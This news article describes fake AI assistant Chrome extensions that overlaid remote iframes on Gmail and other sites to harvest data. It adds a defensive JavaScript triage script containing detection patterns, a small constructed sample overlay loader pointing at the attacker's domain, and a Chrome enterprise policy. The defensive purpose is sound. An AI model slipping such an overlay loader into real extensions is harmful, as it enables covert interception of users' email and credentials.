260,000 Chrome Users Exposed by Fake AI Extensions Targeting Gmail

We have seen our fair share of malicious Chrome extensions in the 17 or so years since Google released the first version of its browser, from fake VPN extensions and outright malicious add-ons to sophisticated session-replay malware.

This time, more than 260,000 Chrome users unknowingly installed browser extensions marketed as helpful AI assistants. According to researchers at LayerX, the coordinated campaign involved more than 30 fake tools posing as services similar to ChatGPT and Claude.

While marketed as productivity tools, these extensions functioned as browser-level spyware.

How the Campaign Worked

Researchers discovered that the malicious extensions shared nearly identical code, permissions, and backend infrastructure. Although they appeared as separate tools with different names and branding, they were built on the same underlying structure.

Security researcher Natalie Zargarov explained that the campaign exploited users’ trust in AI interfaces:

“By injecting iframes that mimic trusted AI interfaces, they’ve created a nearly invisible man-in-the-middle attack that intercepts everything from API keys to personal data before it ever reaches the legitimate service.”

The attack was especially effective because it blended into normal AI interactions, where users are already accustomed to pasting detailed and often sensitive information.

The “AiFrame” Architecture Explained

At the core of the operation was what researchers call an “AiFrame” architecture.

Instead of embedding the full functionality in the extension package that Google reviews when it is submitted to the Chrome Web Store, the extensions:

  • Loaded a full-screen iframe from remote domains (e.g., subdomains of tapnetic[.]pro)
  • Overlaid it on the current webpage
  • Presented it as the AI assistant's interface
  • Pulled instructions dynamically from backend servers

This setup allowed attackers to change the extensions' behavior remotely without pushing an updated version through the Chrome Web Store and its review. In other words, what users installed wasn't necessarily what was running later.

Gmail Was a Primary Target

Fifteen of the malicious extensions specifically targeted Gmail users.

These versions:

  • Ran their content script at document_start on mail.google.com, before Gmail's own code had loaded
  • Injected their own interface elements into Gmail
  • Used MutationObserver callbacks to re-insert themselves as Gmail's single-page interface re-rendered
  • Accessed email threads and, in some cases, draft content
  • Transmitted extracted data back to remote servers

Because the extensions requested the <all_urls> host permission, they could also read data on nearly any site the user visited, including enterprise dashboards and SaaS platforms.
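The indicators described in the two sections above (a remote full-screen iframe loader, document_start on mail.google.com, MutationObserver persistence, and the <all_urls> host permission) can be checked statically on an unpacked extension before it is allowlisted. The following is an added example written for this article, not code from LayerX or from the campaign; it runs under Node, and the manifest and content script it inspects are constructed to resemble the described pattern rather than recovered samples. The subdomain in the sample is a placeholder under the apex domain the article names, not an observed indicator.

```javascript
// Added example (not code from LayerX or the article): static triage of an
// unpacked Chrome extension for the AiFrame-style indicators described above.
// Runs under Node. The samples at the bottom are CONSTRUCTED, not recovered.

// Apex domain named in the article; any host under it is treated as known-bad.
const KNOWN_BAD_APEX = ["tapnetic.pro"];
// API permissions that expose authenticated sessions or allow code injection.
const HIGH_RISK_PERMISSIONS = ["cookies", "webRequest", "scripting", "debugger", "tabs"];

function auditManifest(manifest) {
  const findings = [];
  const contentScripts = manifest.content_scripts || [];
  const hostPatterns = [
    ...(manifest.host_permissions || []),
    ...(manifest.permissions || []), // MV2 manifests list host patterns here
    ...contentScripts.flatMap((cs) => cs.matches || []),
  ];
  if (hostPatterns.includes("<all_urls>")) findings.push("all_urls: can read every site the user visits");
  for (const p of manifest.permissions || []) {
    if (HIGH_RISK_PERMISSIONS.includes(p)) findings.push(`high-risk permission: ${p}`);
  }
  for (const cs of contentScripts) {
    const onGmail = (cs.matches || []).some((m) => m.includes("mail.google.com"));
    if (onGmail && cs.run_at === "document_start") findings.push("document_start on mail.google.com");
  }
  return findings;
}

// Every absolute http(s) URL literal in the script, reduced to its hostname.
function extractRemoteHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/[A-Za-z0-9.-]+/g)) {
    try { hosts.add(new URL(m[0]).hostname); } catch { /* malformed literal, skip */ }
  }
  return [...hosts];
}

function auditContentScript(source) {
  const findings = [];
  const remoteHosts = extractRemoteHosts(source);
  const createsIframe = /createElement\(\s*["'`]iframe["'`]\s*\)/.test(source);
  // Heuristic: fixed positioning plus a 100vw/100vh (or 100%) box is what an
  // overlay hiding the real page looks like. This does not prove the style is
  // applied to the iframe, so it is only reported when an iframe is created too.
  const fullViewport = /position\s*:\s*fixed/.test(source)
    && /width\s*:\s*100(vw|%)/.test(source) && /height\s*:\s*100(vh|%)/.test(source);
  if (createsIframe && remoteHosts.length > 0) findings.push(`remote iframe: ${remoteHosts.join(", ")}`);
  if (createsIframe && fullViewport) findings.push("overlay styled to cover the entire viewport");
  if (/new\s+MutationObserver\s*\(/.test(source)) findings.push("MutationObserver re-insertion");
  if (remoteHosts.length > 0 && /\b(fetch|XMLHttpRequest|sendBeacon)\b/.test(source)) {
    findings.push("sends data to a remote host");
  }
  for (const h of remoteHosts) {
    if (KNOWN_BAD_APEX.some((apex) => h === apex || h.endsWith("." + apex))) {
      findings.push(`contacts known-bad infrastructure: ${h}`);
    }
  }
  return findings;
}

// Combine both audits into a verdict an allowlist reviewer can act on.
function triage(manifest, source) {
  const findings = [...auditManifest(manifest), ...auditContentScript(source)];
  const verdict = findings.length >= 4 ? "block" : findings.length >= 2 ? "review" : "allow";
  return { verdict, findings, remoteHosts: extractRemoteHosts(source) };
}

// CONSTRUCTED sample resembling the described extensions; "assistant." is a
// placeholder subdomain, not an observed indicator.
const sampleManifest = {
  manifest_version: 3, name: "AI Assistant for Gmail", version: "1.4.2",
  host_permissions: ["<all_urls>"], permissions: ["storage", "cookies", "scripting"],
  content_scripts: [{ matches: ["https://mail.google.com/*"], js: ["content.js"], run_at: "document_start" }],
};
const sampleContentScript = `
const frame = document.createElement("iframe");
frame.src = "https://assistant.tapnetic.pro/ui";
frame.style.cssText = "position:fixed;top:0;left:0;width:100vw;height:100vh;border:0;z-index:2147483647";
document.documentElement.appendChild(frame);
new MutationObserver(() => {
  if (!frame.isConnected) document.documentElement.appendChild(frame);
}).observe(document.documentElement, { childList: true, subtree: true });
`;

// CONSTRUCTED benign control: one narrow permission, no remote content.
const benignManifest = { manifest_version: 3, name: "Word Counter", version: "1.0", permissions: ["activeTab"] };
const benignScript = "console.log(document.body.innerText.split(/\\s+/).length);";

console.log(JSON.stringify(triage(sampleManifest, sampleContentScript), null, 2)); // verdict: block
console.log(triage(benignManifest, benignScript).verdict); // allow
```

The point of the exercise is the limit it exposes: the sample loader is a handful of lines and contains nothing that steals data by itself. Everything that mattered in the real campaign lived behind the iframe's URL, which is why a manifest-and-source review should treat "remote iframe over a sensitive site" as a blocking finding on its own rather than waiting for exfiltration code to appear in the package.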

Enterprise Risks and Data Exfiltration

The concern extends beyond individual consumers. These extensions effectively acted as remotely controlled access brokers sitting inside the browser.

By combining privileged browser permissions with backend-controlled interfaces, attackers were able to:

  • Scrape structured page data using Mozilla’s Readability library
  • Extract titles, article text, and metadata
  • Capture sensitive enterprise data inside authenticated sessions
  • Transmit data outside intended browser security boundaries

The infrastructure behind the campaign relied on themed subdomains under tapnetic[.]pro, with rapid “extension spraying” tactics. When one extension was removed from the Chrome Web Store, nearly identical copies appeared shortly afterward under new identifiers.

Why This Attack Is Different

What makes this campaign different isn't just its scale.

Modern browser extensions have access comparable to software installed on the endpoint. When combined with:

  • Automatic updates
  • Remote content loading
  • Broad site permissions

they become powerful surveillance tools. Because much of the malicious logic lived on remote servers rather than in the extension package, takedowns of individual extensions had limited impact.

How Organizations Can Reduce Risk

Security experts recommend a layered defense approach you can implement in your organization today:

1. Restrict Extension Installations
Allow only vetted extensions, enforced through enterprise browser policy (allowlist by extension ID rather than maintaining a blocklist that attackers can outrun with new IDs).

2. Monitor High-Risk Permissions
Flag extensions that request <all_urls>, the cookies permission, or content scripts on sensitive hosts such as webmail and SaaS consoles.

3. Monitor Telemetry
Watch for unusual DOM scraping, iframes injected from origins the page does not use, and unexpected outbound connections from the browser.

4. Enforce Network Controls
Use DNS filtering, egress monitoring, and data loss prevention (DLP).

5. Strengthen Identity Protections
Implement MFA, device trust policies, and least-privilege access.

6. Audit Regularly
Conduct threat hunting and browser configuration reviews to detect extension spraying, where a removed extension reappears under a new ID.
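Steps 1, 2 and 4 above can be enforced with a single Chrome enterprise policy file. The following is an added example for this article, not a configuration published by LayerX or Google; it assumes Chrome on Linux, where managed policies are read from /etc/opt/chrome/policies/managed/ (Windows and macOS take the same keys through GPO or configuration profiles). The 32-character extension ID is a placeholder for one vetted extension, and tapnetic.pro is the only domain the article names.

```json
{
  "ExtensionSettings": {
    "*": {
      "installation_mode": "blocked",
      "blocked_install_message": "Extensions must be requested through the security team.",
      "blocked_permissions": ["cookies", "webRequest", "debugger"],
      "runtime_blocked_hosts": ["*://mail.google.com", "*://*.tapnetic.pro"]
    },
    "abcdefghijklmnopabcdefghijklmnop": {
      "installation_mode": "allowed",
      "runtime_allowed_hosts": ["*://mail.google.com"]
    }
  },
  "URLBlocklist": ["tapnetic.pro"]
}
```

The "*" entry makes deny-by-default the rule: nothing installs unless its ID has its own entry, no extension may use the cookies, webRequest or debugger APIs, and no extension may run on mail.google.com unless, like the placeholder ID, it is explicitly allowed back in with runtime_allowed_hosts. The runtime_blocked_hosts entry for the attacker's domain only stops extensions from touching it; the URLBlocklist entry is what stops the browser from loading frames from it, which is the part that matters against a remote-iframe loader. An allowlist of this kind has to be maintained, so pair it with the audit described in step 6 so that a re-uploaded clone under a new ID never gets an entry.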

A Growing AI-Themed Threat

To me, this campaign shows a broader trend: hackers are using the trust and popularity of AI tools to their advantage.

As AI assistants become deeply integrated into daily work, attackers are increasingly mimicking their interfaces to collect sensitive information.

For users and enterprises alike, the lesson is clear:
“Browser extensions deserve the same scrutiny as installed software.”

The post 260,000 Chrome Users Exposed by Fake AI Extensions Targeting Gmail appeared first on gHacks.